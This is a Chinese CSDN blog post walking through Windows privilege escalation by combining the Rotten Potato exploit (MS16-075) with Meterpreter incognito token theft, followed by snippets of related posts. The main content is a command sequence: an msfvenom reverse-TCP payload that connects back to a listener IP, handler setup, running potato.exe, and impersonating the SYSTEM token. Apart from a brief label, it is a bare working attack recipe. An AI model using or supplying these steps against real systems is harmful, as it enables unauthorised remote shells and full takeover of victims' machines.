烂土豆+令牌窃取提权

已于 2022-04-03 20:24:28 修改
阅读量200 收藏
点赞数
分类专栏: 网安 文章标签: web安全 安全
于 2022-04-03 19:58:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kimojinmmp/article/details/123942969
版权

烂土豆+令牌窃取提权(win2008及之前可以直接使用令牌窃取提权)

potato.exe:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-075/potato.exe

# 1.生成shell上传到目标主机
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.106.150 LPORT=4433 -f exe -o 4433.exe

# 2.开启msf
use /multi/handler
set rhost 127.0.0.1(本机ip)
set rport	4433(本机端口)
set payload windows/meterpreter_reverse_tcp
# 3.加载incoginto功能(用来盗窃目标主机的令牌或是假冒用户)
use incognito
execute -cH -f c:/potato.exe
# 4.列出目标机器用户的可用令牌,并使用system权限
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
# 5.查看权限
getuid
kimojinmmp
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
提权 - Windows 令牌窃取/进程注入提权
acepanhuan的博客
03-01 524
提权 - Windows 令牌窃取/进程注入提权
[内网渗透]—令牌窃取
Sentiment的博客
12-27 2262
令牌(Token)是指系统中的临时秘钥,相当于账户和密码,有了令牌就可以在不知道密码的情况下访问目标相关资源了,这些令牌将持续存在于系统中,除非系统重新启动。
Windows令牌窃取提权土豆提权学习
Goodric的博客
07-24 1695
令牌,又叫token,是系统临时产生的秘钥,相当于账号密码,用来决定是否允许此次请求和判断此次请求是属于哪一个用户。令牌无需提供密码或其他凭证,就可以访问网络和系统资源,这些令牌持续于系统中,除非系统重新启动。令牌的最大特点就是随机性,不可预测,无法猜解。当不同的用户登录计算机后,都会生成一个访问令牌,这个Token在用户创建进程或线程时还会被使用,并不断进行拷贝,一般用户双击运行⼀个进程都会拷贝explorer.exe中的AccessToken令牌的分类。...
windows本地提权--令牌窃取&土豆&UAC
最新发布
金灰的博客
04-23 391
免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等...本地--->system。
MSF+土豆家族窃取访问令牌提权
m0_65554829的博客
11-17 427
在Rotten Potato中使用的 COM 对象为BITS,而Juicy Potato为不同 Windows 版本提供了多个可以利用的COM对象。#在https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md上查找要加载的COM对象的CLSID。在之后的版本中,微软通过检查RPC绑定字符串中指定的端口来修复了这个问题,修复后的系统无法通 过原来的方法实现中间人攻击。# -c,指定要加载的COM对象的CLSID。
PoCs-win提权.zip
04-08
5. **权限令牌窃取**:攻击者获取其他高权限进程的令牌,然后将自己的进程与该令牌关联,从而获得相应的权限。 在"PoCs-master"文件夹中,我们可以找到各种不同的PoC实例,每个实例都对应一种或多种提权技术。分析...
vb.rar_VB 提权_进程提权
09-20
在这个“vb.rar_VB 提权_进程提权”的主题中,我们主要关注的是如何在VB.NET环境中实现进程权限的提升,以便能够执行如杀掉任何进程等需要更高权限的操作。 在Windows操作系统中,每个进程都有自己的安全属性,包括...
system提权工具
09-16
"system提权工具"是指能够帮助用户获取或提升到system权限级别的工具。这类工具通常被系统管理员和安全研究人员用来进行合法的系统调试、故障排除或安全审计。然而,不正当的使用可能导致严重的安全风险,因为system...
SpringCloud微服务项目:nacos+springsecurity+gateway+令牌桶限流
09-27
本项目聚焦于SpringCloud微服务框架的几个核心组件,包括Nacos、Spring Security、Gateway以及令牌桶限流策略。下面将详细介绍这些知识点。 1. **Nacos**: Nacos是阿里巴巴开源的一款动态配置服务和发现服务,它...
窃取AccessToken的方法:incognito.exe程序
07-28
令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。...窃取AccessToken的方法: incognito.exe程序 、InvokeTokenManipulat.ps1脚本 、MSF里的incognito模块
BadPotato:Windows权限提升BadPotato
03-19
土豆 Windows 2012-2019 Windows 8-10 引用
Legofy:Matlab:将普通图片(或网络图片)转成乐高风格,类似https://github.com/JuanPotato/Legofy-matlab开发
05-29
这是一个将普通 RGB 图像转换为乐高风格图像的 Matlab 函数。 输入可以是已导入到Matlab中的图像,也可以是Internet上任何位置的图像的URL地址。 转换超级简单,你只需要下载功能 Legofy.m 此函数将采用三个参数: 要转换的图像, 像素化的比例和, 如果要逐块显示。 参数 2 和 3 是可选的图像可以是图像或 URL。 例子 从维基媒体读取图像并转换(无额外参数)。 结果保存在 dataOut 中并与第二行代码一起显示: dataOut = Legofy(' https://upload.wikimedia.org/wikipedia/commons/d/d5/Vincent_Van_Gogh_0014.jpg'); 图像c(数据输出)
windows提权之at&sc&ps&进程注入&令牌窃取
m0_62207170的博客
03-20 755
windows提权之at&sc&ps&进程注入&令牌窃取
土豆搭配令牌窃取提权&dll劫持搭配令牌窃取提权&不带引号服务路径问题提权&不安全的服务权限配置提权
weixin_46626159的博客
03-21 958
土豆搭配令牌窃取提权&dll劫持搭配令牌窃取提权&不带引号服务路径问题提权&不安全的服务权限配置提权
提权 - Windows 土豆/ dll劫持 /服务权限
acepanhuan的博客
03-01 1212
提权 - Windows 土豆/ dll劫持 /服务权限
Windows权限提升—令牌窃取、UAC提权、进程注入等提权
剁椒鱼头没剁椒的博客
03-27 3924
在之前的文章中已经对Windows的权限提升进行了介绍,这里同样不再赘述,如果想要去了解Windows权限提升可以看以下的文章,同时也将Windows权限提升其它的几种办法也放在下面的文章中。同时本来应该还写一篇第三方全家提权的,但是在实际测试过程中发现,有些第三方提权,如果在电脑上都会自动更新,比如向日葵,低版本的直接无法连接向日葵官方的服务器,那么提个毛权限的啊。Windows权限提升—溢出提权Windows权限提升—MySQL数据库提权
【域渗透篇】windows主机提权令牌窃取
shelter1234567的博客
07-16 414
Windows令牌窃取(Windows token stealing)是一种攻击技术,用于获取用户的访问权限并执行特权操作。在Windows操作系统中,每个用户登录后都会分配一个令牌(token),该令牌包含了用户的安全标识和权限信息。令牌用于验证用户对系统资源的访问权限。​ 令牌假冒(Token impersonation)是一种攻击技术,攻击者通过伪装成其他用户或进程的身份来获取访问权限。在计算机系统中,令牌是用于验证用户身份和授权访问资源的一种机制。
土豆配合令牌窃取提权复现
m0_65096687的博客
05-13 166
土豆配合令牌窃取提权是用来解决普通令牌窃取提权因为webshell权限太低无法提权成功。1.先用msf生成一个windows的后门监听上线。4.使用msf自带的令牌窃取功能。环境:内网kali和win10。3.利用msf上传土豆。先查看一下未提权的权限。2.在网上下载土豆
Windows提权---MSF/令牌窃取/系统服务权限配置错误提权
qq_40012781的博客
07-02 2294
提权是指把普通用户的权限进行提升至高权限的过程,也叫特权提升
Windows访问令牌窃取与伪造技术详解
"本课程主要讲解了如何在Windows系统中窃取、伪造和模拟访问令牌,特别是通过CobaltStrike、meterpreter的incognito模块、Invoke-TokenManipulation.ps1脚本、Tokenvator.exe和Mimikatz工具来实现。课程内容涵盖了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值